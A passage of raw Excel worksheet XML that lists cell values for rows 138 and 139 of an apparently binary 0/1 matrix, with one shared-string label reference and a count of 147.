      <c r="JF138">
        <v>0</v>
      </c>
      <c r="JG138">
        <v>0</v>
      </c>
      <c r="JH138">
        <v>0</v>
      </c>
      <c r="JI138">
        <v>1</v>
      </c>
      <c r="JJ138">
        <v>0</v>
      </c>
      <c r="JK138">
        <v>0</v>
      </c>
      <c r="JL138">
        <v>0</v>
      </c>
      <c r="JM138">
        <v>0</v>
      </c>
      <c r="JN138">
        <v>0</v>
      </c>
      <c r="JO138">
        <v>0</v>
      </c>
      <c r="JP138">
        <v>0</v>
      </c>
      <c r="JQ138">
        <v>1</v>
      </c>
      <c r="JR138">
        <v>0</v>
      </c>
      <c r="JS138">
        <v>0</v>
      </c>
      <c r="JT138">
        <v>0</v>
      </c>
      <c r="JU138">
        <v>0</v>
      </c>
      <c r="JV138">
        <v>0</v>
      </c>
      <c r="JW138">
        <v>0</v>
      </c>
      <c r="JX138">
        <v>0</v>
      </c>
      <c r="JY138">
        <v>0</v>
      </c>
      <c r="JZ138">
        <v>0</v>
      </c>
      <c r="KA138">
        <v>0</v>
      </c>
      <c r="KB138">
        <v>0</v>
      </c>
      <c r="KC138">
        <v>0</v>
      </c>
      <c r="KD138">
        <v>0</v>
      </c>
      <c r="KE138">
        <v>0</v>
      </c>
      <c r="KF138">
        <v>0</v>
      </c>
      <c r="KG138">
        <v>0</v>
      </c>
      <c r="KH138">
        <v>0</v>
      </c>
      <c r="KI138">
        <v>0</v>
      </c>
      <c r="KJ138">
        <v>0</v>
      </c>
      <c r="KK138">
        <v>0</v>
      </c>
      <c r="KL138">
        <v>0</v>
      </c>
      <c r="KM138">
        <v>0</v>
      </c>
      <c r="KN138">
        <v>0</v>
      </c>
      <c r="KO138">
        <v>0</v>
      </c>
      <c r="KP138">
        <v>0</v>
      </c>
      <c r="KQ138">
        <v>0</v>
      </c>
      <c r="KR138">
        <v>0</v>
      </c>
      <c r="KS138">
        <v>0</v>
      </c>
      <c r="KT138">
        <v>0</v>
      </c>
      <c r="KU138">
        <v>0</v>
      </c>
      <c r="KV138">
        <v>0</v>
      </c>
      <c r="KW138">
        <v>0</v>
      </c>
      <c r="KX138">
        <v>0</v>
      </c>
      <c r="KY138">
        <v>0</v>
      </c>
      <c r="KZ138">
        <v>0</v>
      </c>
      <c r="LA138">
        <v>0</v>
      </c>
      <c r="LB138">
        <v>0</v>
      </c>
      <c r="LC138">
        <v>0</v>
      </c>
      <c r="LD138">
        <v>0</v>
      </c>
      <c r="LE138">
        <v>0</v>
      </c>
      <c r="LF138">
        <v>0</v>
      </c>
      <c r="LG138">
        <v>0</v>
      </c>
      <c r="LH138">
        <v>0</v>
      </c>
      <c r="LI138">
        <v>0</v>
      </c>
      <c r="LJ138">
        <v>1</v>
      </c>
      <c r="LK138">
        <v>0</v>
      </c>
      <c r="LL138">
        <v>0</v>
      </c>
      <c r="LM138">
        <v>0</v>
      </c>
      <c r="LN138">
        <v>0</v>
      </c>
      <c r="LO138">
        <v>0</v>
      </c>
      <c r="LP138">
        <v>0</v>
      </c>
      <c r="LQ138">
        <v>0</v>
      </c>
      <c r="LR138">
        <v>0</v>
      </c>
      <c r="LS138">
        <v>0</v>
      </c>
      <c r="LT138">
        <v>0</v>
      </c>
      <c r="LU138">
        <v>0</v>
      </c>
      <c r="LV138">
        <v>0</v>
      </c>
      <c r="LW138">
        <v>0</v>
      </c>
      <c r="LX138">
        <v>0</v>
      </c>
      <c r="LY138">
        <v>0</v>
      </c>
      <c r="LZ138">
        <v>0</v>
      </c>
      <c r="MA138">
        <v>0</v>
      </c>
      <c r="MB138">
        <v>0</v>
      </c>
      <c r="MC138">
        <v>0</v>
      </c>
      <c r="MD138">
        <v>0</v>
      </c>
      <c r="ME138">
        <v>0</v>
      </c>
      <c r="MF138">
        <v>0</v>
      </c>
      <c r="MG138">
        <v>0</v>
      </c>
      <c r="MH138">
        <v>0</v>
      </c>
      <c r="MI138">
        <v>0</v>
      </c>
      <c r="MJ138">
        <v>0</v>
      </c>
      <c r="MK138">
        <v>0</v>
      </c>
      <c r="ML138">
        <v>0</v>
      </c>
      <c r="MM138">
        <v>0</v>
      </c>
      <c r="MN138">
        <v>0</v>
      </c>
      <c r="MO138">
        <v>0</v>
      </c>
      <c r="MP138">
        <v>0</v>
      </c>
      <c r="MQ138">
        <v>0</v>
      </c>
      <c r="MR138">
        <v>0</v>
      </c>
      <c r="MS138">
        <v>0</v>
      </c>
      <c r="MT138">
        <v>0</v>
      </c>
      <c r="MU138">
        <v>1</v>
      </c>
      <c r="MV138">
        <v>0</v>
      </c>
      <c r="MW138">
        <v>0</v>
      </c>
      <c r="MX138">
        <v>0</v>
      </c>
      <c r="MY138">
        <v>0</v>
      </c>
      <c r="MZ138">
        <v>0</v>
      </c>
      <c r="NA138">
        <v>0</v>
      </c>
      <c r="NB138">
        <v>0</v>
      </c>
      <c r="NC138">
        <v>0</v>
      </c>
      <c r="ND138">
        <v>0</v>
      </c>
      <c r="NE138">
        <v>0</v>
      </c>
      <c r="NF138">
        <v>0</v>
      </c>
      <c r="NG138">
        <v>0</v>
      </c>
      <c r="NH138">
        <v>0</v>
      </c>
      <c r="NI138">
        <v>0</v>
      </c>
      <c r="NJ138">
        <v>0</v>
      </c>
      <c r="NK138">
        <v>0</v>
      </c>
      <c r="NL138">
        <v>0</v>
      </c>
      <c r="NM138">
        <v>0</v>
      </c>
      <c r="NN138">
        <v>0</v>
      </c>
      <c r="NO138">
        <v>0</v>
      </c>
      <c r="NP138">
        <v>0</v>
      </c>
      <c r="NQ138">
        <v>0</v>
      </c>
      <c r="NR138">
        <v>0</v>
      </c>
      <c r="NS138">
        <v>0</v>
      </c>
      <c r="NT138">
        <v>0</v>
      </c>
      <c r="NU138">
        <v>0</v>
      </c>
      <c r="NV138">
        <v>0</v>
      </c>
      <c r="NW138">
        <v>0</v>
      </c>
      <c r="NX138">
        <v>0</v>
      </c>
      <c r="NY138">
        <v>0</v>
      </c>
      <c r="NZ138">
        <v>0</v>
      </c>
      <c r="OA138">
        <v>0</v>
      </c>
      <c r="OB138">
        <v>0</v>
      </c>
      <c r="OC138">
        <v>0</v>
      </c>
      <c r="OD138">
        <v>0</v>
      </c>
      <c r="OE138">
        <v>0</v>
      </c>
      <c r="OF138">
        <v>0</v>
      </c>
      <c r="OG138">
        <v>0</v>
      </c>
      <c r="OH138">
        <v>0</v>
      </c>
      <c r="OI138">
        <v>0</v>
      </c>
      <c r="OJ138">
        <v>0</v>
      </c>
      <c r="OK138">
        <v>0</v>
      </c>
      <c r="OL138">
        <v>0</v>
      </c>
      <c r="OM138">
        <v>0</v>
      </c>
      <c r="ON138">
        <v>1</v>
      </c>
      <c r="OO138">
        <v>0</v>
      </c>
      <c r="OP138">
        <v>0</v>
      </c>
      <c r="OQ138">
        <v>0</v>
      </c>
      <c r="OR138">
        <v>0</v>
      </c>
      <c r="OS138">
        <v>0</v>
      </c>
      <c r="OT138">
        <v>0</v>
      </c>
      <c r="OU138">
        <v>0</v>
      </c>
      <c r="OV138">
        <v>0</v>
      </c>
      <c r="OW138">
        <v>0</v>
      </c>
      <c r="OX138">
        <v>0</v>
      </c>
      <c r="OY138">
        <v>0</v>
      </c>
      <c r="OZ138">
        <v>0</v>
      </c>
      <c r="PA138">
        <v>0</v>
      </c>
      <c r="PB138">
        <v>0</v>
      </c>
      <c r="PC138">
        <v>0</v>
      </c>
      <c r="PD138">
        <v>0</v>
      </c>
      <c r="PE138">
        <v>0</v>
      </c>
      <c r="PF138">
        <v>0</v>
      </c>
      <c r="PG138">
        <v>0</v>
      </c>
      <c r="PH138">
        <v>0</v>
      </c>
      <c r="PI138">
        <v>0</v>
      </c>
      <c r="PJ138">
        <v>0</v>
      </c>
      <c r="PK138">
        <v>0</v>
      </c>
      <c r="PL138">
        <v>0</v>
      </c>
      <c r="PM138">
        <v>0</v>
      </c>
      <c r="PN138">
        <v>0</v>
      </c>
      <c r="PO138">
        <v>0</v>
      </c>
      <c r="PP138">
        <v>0</v>
      </c>
      <c r="PQ138">
        <v>0</v>
      </c>
      <c r="PR138">
        <v>0</v>
      </c>
      <c r="PS138">
        <v>0</v>
      </c>
      <c r="PT138">
        <v>0</v>
      </c>
      <c r="PU138">
        <v>0</v>
      </c>
      <c r="PV138">
        <v>0</v>
      </c>
      <c r="PW138">
        <v>0</v>
      </c>
      <c r="PX138">
        <v>0</v>
      </c>
      <c r="PY138">
        <v>0</v>
      </c>
      <c r="PZ138">
        <v>0</v>
      </c>
      <c r="QA138">
        <v>0</v>
      </c>
      <c r="QB138">
        <v>0</v>
      </c>
      <c r="QC138">
        <v>0</v>
      </c>
      <c r="QD138">
        <v>0</v>
      </c>
      <c r="QE138">
        <v>0</v>
      </c>
      <c r="QF138">
        <v>0</v>
      </c>
      <c r="QG138">
        <v>0</v>
      </c>
      <c r="QH138">
        <v>0</v>
      </c>
      <c r="QI138">
        <v>0</v>
      </c>
      <c r="QJ138">
        <v>0</v>
      </c>
      <c r="QK138">
        <v>0</v>
      </c>
      <c r="QL138">
        <v>0</v>
      </c>
      <c r="QM138">
        <v>0</v>
      </c>
      <c r="QN138">
        <v>0</v>
      </c>
      <c r="QO138">
        <v>0</v>
      </c>
      <c r="QP138">
        <v>0</v>
      </c>
      <c r="QQ138">
        <v>0</v>
      </c>
      <c r="QR138">
        <v>0</v>
      </c>
      <c r="QS138">
        <v>0</v>
      </c>
      <c r="QT138">
        <v>0</v>
      </c>
      <c r="QU138">
        <v>0</v>
      </c>
      <c r="QV138">
        <v>0</v>
      </c>
      <c r="QW138">
        <v>1</v>
      </c>
      <c r="QX138">
        <v>0</v>
      </c>
      <c r="QY138">
        <v>0</v>
      </c>
      <c r="QZ138">
        <v>0</v>
      </c>
      <c r="RA138">
        <v>0</v>
      </c>
      <c r="RB138">
        <v>0</v>
      </c>
      <c r="RC138">
        <v>0</v>
      </c>
      <c r="RD138">
        <v>0</v>
      </c>
      <c r="RE138">
        <v>0</v>
      </c>
      <c r="RF138">
        <v>1</v>
      </c>
      <c r="RG138">
        <v>0</v>
      </c>
      <c r="RH138">
        <v>0</v>
      </c>
      <c r="RI138">
        <v>0</v>
      </c>
      <c r="RJ138">
        <v>0</v>
      </c>
      <c r="RK138">
        <v>0</v>
      </c>
      <c r="RL138">
        <v>0</v>
      </c>
      <c r="RM138">
        <v>0</v>
      </c>
      <c r="RN138">
        <v>0</v>
      </c>
      <c r="RO138">
        <v>0</v>
      </c>
      <c r="RP138">
        <v>0</v>
      </c>
      <c r="RQ138">
        <v>0</v>
      </c>
      <c r="RR138">
        <v>0</v>
      </c>
      <c r="RS138">
        <v>0</v>
      </c>
      <c r="RT138">
        <v>0</v>
      </c>
      <c r="RU138">
        <v>0</v>
      </c>
      <c r="RV138">
        <v>0</v>
      </c>
      <c r="RW138">
        <v>0</v>
      </c>
      <c r="RX138">
        <v>0</v>
      </c>
      <c r="RY138">
        <v>0</v>
      </c>
      <c r="RZ138">
        <v>0</v>
      </c>
      <c r="SA138">
        <v>0</v>
      </c>
    </row>
    <row r="139" spans="1:495" x14ac:dyDescent="0.2">
      <c r="A139" s="6" t="s">
        <v>4151</v>
      </c>
      <c r="B139">
        <v>147</v>
      </c>
      <c r="C139">
        <v>0</v>
      </c>
      <c r="D139">
        <v>0</v>
      </c>
      <c r="E139">
        <v>0</v>
      </c>
      <c r="F139">
        <v>1</v>
      </c>
      <c r="G139">
        <v>0</v>
      </c>
      <c r="H139">
        <v>0</v>
      </c>
      <c r="I139">
        <v>0</v>
      </c>
      <c r="J139">
        <v>0</v>
      </c>
      <c r="K139">
        <v>1</v>
      </c>
      <c r="L139">
        <v>1</v>
      </c>
      <c r="M139">
        <v>1</v>
      </c>
      <c r="N139">
        <v>0</v>
      </c>
      <c r="O139">
        <v>0</v>
      </c>
      <c r="P139">
        <v>1</v>
      </c>
      <c r="Q139">
        <v>1</v>
      </c>
      <c r="R139">
        <v>0</v>
      </c>
      <c r="S139">
        <v>0</v>
      </c>
      <c r="T139">
        <v>1</v>
      </c>
      <c r="U139">
        <v>0</v>
      </c>
      <c r="V139">
        <v>0</v>
      </c>
      <c r="W139">
        <v>0</v>
      </c>
      <c r="X139">
        <v>0</v>
      </c>
      <c r="Y139">
        <v>1</v>
      </c>
      <c r="Z139">
        <v>0</v>
      </c>
      <c r="AA139">
        <v>0</v>
      </c>
      <c r="AB139">
        <v>1</v>
      </c>
      <c r="AC139">
        <v>1</v>
      </c>
      <c r="AD139">
        <v>0</v>
      </c>
      <c r="AE139">
        <v>0</v>
      </c>
      <c r="AF139">
        <v>0</v>
      </c>
      <c r="AG139">
        <v>0</v>
      </c>
      <c r="AH139">
        <v>0</v>
      </c>
      <c r="AI139">
        <v>1</v>
      </c>
      <c r="AJ139">
        <v>1</v>
      </c>
      <c r="AK139">
        <v>1</v>
      </c>
      <c r="AL139">
        <v>0</v>
      </c>
      <c r="AM139">
        <v>0</v>
      </c>
      <c r="AN139">
        <v>1</v>
      </c>
      <c r="AO139">
        <v>1</v>
      </c>
      <c r="AP139">
        <v>0</v>
      </c>
      <c r="AQ139">
        <v>1</v>
      </c>
      <c r="AR139">
        <v>0</v>
      </c>
      <c r="AS139">
        <v>0</v>
      </c>
      <c r="AT139">
        <v>0</v>
      </c>
      <c r="AU139">
        <v>0</v>
      </c>
      <c r="AV139">
        <v>0</v>
      </c>
      <c r="AW139">
        <v>0</v>
      </c>
      <c r="AX139">
        <v>0</v>
      </c>
      <c r="AY139">
        <v>0</v>
      </c>
      <c r="AZ139">
        <v>0</v>
      </c>
      <c r="BA139">
        <v>0</v>
      </c>
      <c r="BB139">
        <v>1</v>
      </c>
      <c r="BC139">
        <v>0</v>
      </c>
      <c r="BD139">
        <v>0</v>
      </c>
      <c r="BE139">
        <v>0</v>
      </c>
      <c r="BF139">
        <v>0</v>
      </c>
      <c r="BG139">
        <v>1</v>
      </c>
      <c r="BH139">
        <v>0</v>
      </c>
      <c r="BI139">
        <v>0</v>
      </c>
      <c r="BJ139">
        <v>1</v>
      </c>
      <c r="BK139">
        <v>0</v>
      </c>
      <c r="BL139">
        <v>0</v>
      </c>
      <c r="BM139">
        <v>1</v>
      </c>
      <c r="BN139">
        <v>0</v>
      </c>
      <c r="BO139">
        <v>0</v>
      </c>
      <c r="BP139">
        <v>1</v>
      </c>
      <c r="BQ139">
        <v>0</v>
      </c>
      <c r="BR139">
        <v>0</v>
      </c>
      <c r="BS139">
        <v>0</v>
      </c>
      <c r="BT139">
        <v>0</v>
      </c>
      <c r="BU139">
        <v>1</v>
      </c>
      <c r="BV139">
        <v>0</v>
      </c>
      <c r="BW139">
        <v>0</v>
      </c>
      <c r="BX139">
        <v>0</v>
      </c>
      <c r="BY139">
        <v>0</v>
      </c>
      <c r="BZ139">
        <v>0</v>
      </c>
      <c r="CA139">
        <v>0</v>
      </c>
      <c r="CB139">
        <v>0</v>
      </c>
      <c r="CC139">
        <v>0</v>
      </c>
      <c r="CD139">
        <v>0</v>
      </c>
      <c r="CE139">
        <v>0</v>
      </c>
      <c r="CF139">
        <v>0</v>
      </c>
      <c r="CG139">
        <v>0</v>
      </c>
      <c r="CH139">
        <v>0</v>
      </c>
      <c r="CI139">
        <v>0</v>
      </c>
      <c r="CJ139">
        <v>0</v>
      </c>
      <c r="CK139">
        <v>0</v>
      </c>
      <c r="CL139">
        <v>1</v>
      </c>
      <c r="CM139">
        <v>0</v>
      </c>
      <c r="CN139">
        <v>0</v>
      </c>
      <c r="CO139">
        <v>0</v>
      </c>
      <c r="CP139">
        <v>0</v>
      </c>
      <c r="CQ139">
        <v>0</v>
      </c>
      <c r="CR139">
        <v>0</v>
      </c>
      <c r="CS139">
        <v>1</v>
      </c>
      <c r="CT139">
        <v>1</v>
      </c>
      <c r="CU139">
        <v>0</v>
      </c>
      <c r="CV139">
        <v>0</v>
      </c>
      <c r="CW139">
        <v>0</v>
      </c>
      <c r="CX139">
        <v>0</v>
      </c>
      <c r="CY139">
        <v>0</v>
      </c>
      <c r="CZ139">
        <v>0</v>
      </c>
      <c r="DA139">
        <v>0</v>
      </c>
      <c r="DB139">
        <v>1</v>
      </c>
      <c r="DC139">
        <v>1</v>
      </c>
      <c r="DD139">
        <v>0</v>
      </c>
      <c r="DE139">
        <v>1</v>
      </c>
      <c r="DF139">
        <v>0</v>
      </c>
      <c r="DG139">
        <v>1</v>
      </c>
      <c r="DH139">
        <v>0</v>
      </c>
      <c r="DI139">
        <v>0</v>
      </c>
      <c r="DJ139">
        <v>0</v>
      </c>
      <c r="DK139">
        <v>0</v>
      </c>
      <c r="DL139">
        <v>1</v>
      </c>
      <c r="DM139">
        <v>0</v>
      </c>
      <c r="DN139">
        <v>0</v>
      </c>
      <c r="DO139">
        <v>0</v>
      </c>
      <c r="DP139">
        <v>1</v>
      </c>
      <c r="DQ139">
        <v>1</v>
      </c>
      <c r="DR139">
        <v>0</v>
      </c>
      <c r="DS139">
        <v>1</v>
      </c>
      <c r="DT139">
        <v>0</v>
      </c>
      <c r="DU139">
        <v>0</v>
      </c>
      <c r="DV139">
        <v>0</v>
      </c>
      <c r="DW139">
        <v>1</v>
      </c>
      <c r="DX139">
        <v>1</v>
      </c>
      <c r="DY139">
        <v>0</v>
      </c>
      <c r="DZ139">
        <v>0</v>
      </c>
      <c r="EA139">
        <v>0</v>
      </c>
      <c r="EB139">
        <v>0</v>
      </c>
      <c r="EC139">
        <v>1</v>
      </c>
      <c r="ED139">
        <v>0</v>
      </c>
      <c r="EE139">
        <v>0</v>
      </c>
      <c r="EF139">
        <v>0</v>
      </c>
      <c r="EG139">
        <v>0</v>
      </c>
      <c r="EH139">
        <v>0</v>
      </c>
      <c r="EI139">
        <v>0</v>
      </c>
      <c r="EJ139">
        <v>0</v>
      </c>
      <c r="EK139">
        <v>0</v>
      </c>
      <c r="EL139">
        <v>0</v>
      </c>
      <c r="EM139">
        <v>1</v>
      </c>
      <c r="EN139">
        <v>1</v>
      </c>
      <c r="EO139">
        <v>0</v>
      </c>
      <c r="EP139">
        <v>0</v>
      </c>
      <c r="EQ139">
        <v>1</v>
      </c>
      <c r="ER139">
        <v>0</v>
      </c>
      <c r="ES139">
        <v>0</v>
      </c>
      <c r="ET139">
        <v>1</v>
      </c>
      <c r="EU139">
        <v>0</v>
      </c>
      <c r="EV139">
        <v>0</v>
      </c>
      <c r="EW139">
        <v>1</v>
      </c>
      <c r="EX139">
        <v>0</v>
      </c>
      <c r="EY139">
        <v>1</v>
      </c>
      <c r="EZ139">
        <v>0</v>
      </c>
      <c r="FA139">
        <v>1</v>
      </c>
      <c r="FB139">
        <v>1</v>
      </c>
      <c r="FC139">
        <v>0</v>
      </c>
      <c r="FD139">
        <v>1</v>
      </c>
      <c r="FE139">
        <v>0</v>
      </c>
      <c r="FF139">
        <v>0</v>
      </c>
      <c r="FG139">
        <v>0</v>
      </c>
      <c r="FH139">
        <v>1</v>
      </c>
      <c r="FI139">
        <v>0</v>
      </c>
      <c r="FJ139">
        <v>0</v>
      </c>
      <c r="FK139">
        <v>0</v>
      </c>
      <c r="FL139">
        <v>0</v>
      </c>
      <c r="FM139">
        <v>0</v>
      </c>
      <c r="FN139">
        <v>1</v>
      </c>
      <c r="FO139">
        <v>0</v>
      </c>
      <c r="FP139">
        <v>1</v>
      </c>
      <c r="FQ139">
        <v>0</v>
      </c>
      <c r="FR139">
        <v>0</v>
      </c>
      <c r="FS139">
        <v>1</v>
      </c>
      <c r="FT139">
        <v>0</v>
      </c>
      <c r="FU139">
        <v>0</v>
      </c>
      <c r="FV139">
        <v>1</v>
      </c>
      <c r="FW139">
        <v>1</v>
      </c>
      <c r="FX139">
        <v>1</v>
      </c>
      <c r="FY139">
        <v>1</v>
      </c>
      <c r="FZ139">
        <v>0</v>
      </c>
      <c r="GA139">
        <v>0</v>
      </c>
      <c r="GB139">
        <v>0</v>
      </c>
      <c r="GC139">
        <v>1</v>
      </c>
      <c r="GD139">
        <v>0</v>
      </c>
      <c r="GE139">
        <v>1</v>
      </c>
      <c r="GF139">
        <v>1</v>
      </c>
      <c r="GG139">
        <v>0</v>
      </c>
      <c r="GH139">
        <v>0</v>
      </c>
      <c r="GI139">
        <v>1</v>
      </c>
      <c r="GJ139">
        <v>0</v>
      </c>
      <c r="GK139">
        <v>1</v>
      </c>
      <c r="GL139">
        <v>1</v>
      </c>
      <c r="GM139">
        <v>0</v>
      </c>
      <c r="GN139">
        <v>0</v>
      </c>
      <c r="GO139">
        <v>0</v>
      </c>
      <c r="GP139">
        <v>1</v>
      </c>
      <c r="GQ139">
        <v>0</v>
      </c>
      <c r="GR139">
        <v>0</v>
      </c>
      <c r="GS139">
        <v>1</v>
      </c>
      <c r="GT139">
        <v>0</v>
      </c>
      <c r="GU139">
        <v>1</v>
      </c>
      <c r="GV139">
        <v>0</v>
      </c>
      <c r="GW139">
        <v>0</v>
      </c>
      <c r="GX139">
        <v>0</v>
      </c>
      <c r="GY139">
        <v>0</v>
      </c>
      <c r="GZ139">
        <v>0</v>
      </c>
      <c r="HA139">
        <v>1</v>
      </c>
      <c r="HB139">
        <v>0</v>
      </c>
      <c r="HC139">
        <v>1</v>
      </c>
      <c r="HD139">
        <v>0</v>
      </c>
      <c r="HE139">
        <v>0</v>
      </c>
      <c r="HF139">
        <v>0</v>
      </c>
      <c r="HG139">
        <v>1</v>
      </c>
      <c r="HH139">
        <v>1</v>
      </c>
      <c r="HI139">
        <v>0</v>
      </c>
      <c r="HJ139">
        <v>0</v>
      </c>
      <c r="HK139">
        <v>1</v>
      </c>
      <c r="HL139">
        <v>0</v>
      </c>
      <c r="HM139">
        <v>1</v>
      </c>
      <c r="HN139">
        <v>1</v>
      </c>
      <c r="HO139">
        <v>0</v>
      </c>
      <c r="HP139">
        <v>0</v>
      </c>
      <c r="HQ139">
        <v>0</v>
      </c>
      <c r="HR139">
        <v>0</v>
      </c>
      <c r="HS139">
        <v>1</v>
      </c>
      <c r="HT139">
        <v>1</v>
      </c>
      <c r="HU139">
        <v>1</v>
      </c>
      <c r="HV139">
        <v>1</v>
      </c>
      <c r="HW139">
        <v>0</v>
      </c>
      <c r="HX139">
        <v>0</v>
      </c>
      <c r="HY139">
        <v>0</v>
      </c>
      <c r="HZ139">
        <v>0</v>
      </c>
      <c r="IA139">
        <v>0</v>
      </c>
      <c r="IB139">
        <v>0</v>
      </c>
      <c r="IC139">
        <v>1</v>
      </c>
      <c r="ID139">
        <v>0</v>
      </c>
      <c r="IE139">
        <v>0</v>
      </c>
      <c r="IF139">
        <v>0</v>
      </c>
      <c r="IG139">
        <v>0</v>
      </c>
      <c r="IH139">
        <v>0</v>
      </c>
      <c r="II139">
        <v>0</v>
      </c>
      <c r="IJ139">
        <v>0</v>
      </c>
      <c r="IK139">
        <v>1</v>
      </c>
      <c r="IL139">
        <v>0</v>
      </c>
      <c r="IM139">
        <v>0</v>
      </c>
      <c r="IN139">
        <v>0</v>
      </c>
      <c r="IO139">
        <v>1</v>
      </c>
      <c r="IP139">
        <v>1</v>
      </c>
      <c r="IQ139">
        <v>1</v>
      </c>
      <c r="IR139">
        <v>0</v>
      </c>
      <c r="IS139">
        <v>0</v>
      </c>
      <c r="IT139">
        <v>0</v>
      </c>
      <c r="IU139">
        <v>0</v>
      </c>
      <c r="IV139">
        <v>1</v>
      </c>
      <c r="IW139">
        <v>0</v>
      </c>
      <c r="IX139">
        <v>1</v>
      </c>
      <c r="IY139">
        <v>0</v>
      </c>
      <c r="IZ139">
        <v>0</v>
      </c>
      <c r="JA139">
        <v>0</v>
      </c>
      <c r="JB139">
        <v>0</v>
      </c>
      <c r="JC139">
        <v>0</v>
      </c>
      <c r="JD139">
        <v>0</v>
      </c>
      <c r="JE139">
        <v>0</v>
      </c>
      <c r="JF139">
        <v>0</v>
      </c>
      <c r="JG139">
        <v>0</v>
      </c>
      <c r="JH139">
        <v>0</v>
      </c>
      <c r="JI139">
        <v>0</v>
      </c>
      <c r="JJ139">
        <v>0</v>
      </c>
      <c r="JK139">
        <v>0</v>
      </c>
      <c r="JL139">
        <v>0</v>
      </c>
      <c r="JM139">
        <v>1</v>
      </c>
      <c r="JN139">
        <v>1</v>
      </c>
      <c r="JO139">
        <v>0</v>
      </c>
      <c r="JP139">
        <v>1</v>
      </c>
      <c r="JQ139">
        <v>0</v>
      </c>
      <c r="JR139">
        <v>0</v>
      </c>
      <c r="JS139">
        <v>1</v>
      </c>
      <c r="JT139">
        <v>0</v>
      </c>
      <c r="JU139">
        <v>0</v>
      </c>
      <c r="JV139">
        <v>0</v>
      </c>
      <c r="JW139">
        <v>1</v>
      </c>
      <c r="JX139">
        <v>0</v>
      </c>
      <c r="JY139">
        <v>0</v>
      </c>
      <c r="JZ139">
        <v>0</v>
      </c>
      <c r="KA139">
        <v>1</v>
      </c>
      <c r="KB139">
        <v>0</v>
      </c>
      <c r="KC139">
        <v>0</v>
      </c>
      <c r="KD139">
        <v>0</v>
      </c>
      <c r="KE139">
        <v>1</v>
      </c>
      <c r="KF139">
        <v>0</v>
      </c>
      <c r="KG139">
        <v>0</v>
      </c>
      <c r="KH139">
        <v>1</v>
      </c>
      <c r="KI139">
        <v>0</v>
      </c>
      <c r="KJ139">
        <v>1</v>
      </c>
      <c r="KK139">
        <v>0</v>
      </c>
      <c r="KL139">
        <v>1</v>
      </c>
      <c r="KM139">
        <v>1</v>
      </c>
      <c r="KN139">
        <v>1</v>
      </c>
      <c r="KO139">
        <v>0</v>
      </c>
      <c r="KP139">
        <v>0</v>
      </c>
      <c r="KQ139">
        <v>0</v>
      </c>
      <c r="KR139">
        <v>0</v>
      </c>
      <c r="KS139">
        <v>0</v>
      </c>
      <c r="KT139">
        <v>0</v>
      </c>
      <c r="KU139">
        <v>0</v>
      </c>
      <c r="KV139">
        <v>0</v>
      </c>
      <c r="KW139">
        <v>1</v>
      </c>
      <c r="KX139">
        <v>0</v>
      </c>
      <c r="KY139">
        <v>0</v>
      </c>
      <c r="KZ139">
        <v>1</v>
      </c>
      <c r="LA139">
        <v>1</v>
      </c>
      <c r="LB139">
        <v>0</v>
      </c>
      <c r="LC139">
        <v>0</v>
      </c>
      <c r="LD139">
        <v>0</v>
      </c>
      <c r="LE139">
        <v>1</v>
      </c>
      <c r="LF139">
        <v>1</v>
      </c>
      <c r="LG139">
        <v>0</v>
      </c>
      <c r="LH139">
        <v>0</v>
      </c>
      <c r="LI139">
        <v>1</v>
      </c>
      <c r="LJ139">
        <v>0</v>
      </c>
      <c r="LK139">
        <v>1</v>
      </c>
      <c r="LL139">
        <v>1</v>
      </c>
      <c r="LM139">
        <v>0</v>
      </c>
      <c r="LN139">
        <v>0</v>
      </c>
      <c r="LO139">
        <v>0</v>
      </c>
      <c r="LP139">
        <v>1</v>
      </c>
      <c r="LQ139">
        <v>1</v>
      </c>
      <c r="LR139">
        <v>1</v>
      </c>
      <c r="LS139">
        <v>0</v>
      </c>
      <c r="LT139">
        <v>0</v>
      </c>
      <c r="LU139">
        <v>0</v>
      </c>
      <c r="LV139">
        <v>1</v>
      </c>
      <c r="LW139">
        <v>1</v>
      </c>
      <c r="LX139">
        <v>0</v>
      </c>
      <c r="LY139">
        <v>0</v>
      </c>
      <c r="LZ139">
        <v>0</v>
      </c>
      <c r="MA139">
        <v>0</v>
      </c>
      <c r="MB139">
        <v>0</v>
      </c>
      <c r="MC139">
        <v>1</v>
      </c>
      <c r="MD139">
        <v>1</v>
      </c>
      <c r="ME139">
        <v>0</v>
      </c>
      <c r="MF139">
        <v>0</v>
      </c>
      <c r="MG139">
        <v>0</v>
      </c>
      <c r="MH139">
        <v>0</v>
      </c>
      <c r="MI139">
        <v>0</v>
      </c>
      <c r="MJ139">
        <v>0</v>
      </c>
      <c r="MK139">
        <v>0</v>
      </c>
      <c r="ML139">
        <v>1</v>
      </c>
      <c r="MM139">
        <v>0</v>
      </c>
      <c r="MN139">
        <v>0</v>
      </c>
      <c r="MO139">
        <v>0</v>
      </c>
      <c r="MP139">
        <v>1</v>
      </c>
      <c r="MQ139">
        <v>0</v>
      </c>
      <c r="MR139">
        <v>0</v>
      </c>
      <c r="MS139">
        <v>0</v>
      </c>
      <c r="MT139">
        <v>0</v>
      </c>
      <c r="MU139">
        <v>1</v>
      </c>
      <c r="MV139">
        <v>0</v>
      </c>
      <c r="MW139">
        <v>0</v>
      </c>
      <c r="MX139">
        <v>1</v>
      </c>
      <c r="MY139">
        <v>1</v>
      </c>
      <c r="MZ139">
        <v>0</v>
      </c>
      <c r="NA139">
        <v>0</v>
      </c>
      <c r="NB139">
        <v>0</v>
      </c>
      <c r="NC139">
        <v>0</v>
      </c>
      <c r="ND139">
        <v>0</v>
      </c>
      <c r="NE139">
        <v>1</v>
      </c>
      <c r="NF139">
        <v>0</v>
      </c>
      <c r="NG139">
        <v>0</v>
      </c>
      <c r="NH139">
        <v>0</v>
      </c>
      <c r="NI139">
        <v>0</v>
      </c>
      <c r="NJ139">
        <v>1</v>
      </c>
      <c r="NK139">
        <v>1</v>
      </c>
      <c r="NL139">
        <v>1</v>
      </c>
      <c r="NM139">
        <v>0</v>
      </c>
      <c r="NN139">
        <v>0</v>
      </c>
      <c r="NO139">
        <v>0</v>
      </c>
      <c r="NP139">
        <v>1</v>
      </c>
      <c r="NQ139">
        <v>1</v>
      </c>
      <c r="NR139">
        <v>1</v>
      </c>
      <c r="NS139">
        <v>1</v>
      </c>
      <c r="NT139">
        <v>1</v>
      </c>
      <c r="NU139">
        <v>0</v>
      </c>
      <c r="NV139">
        <v>0</v>
      </c>
      <c r="NW139">
        <v>0</v>
      </c>
      <c r="NX139">
        <v>1</v>
      </c>
      <c r="NY139">
        <v>0</v>
      </c>
      <c r="NZ139">
        <v>1</v>
      </c>
      <c r="OA139">
        <v>0</v>
      </c>
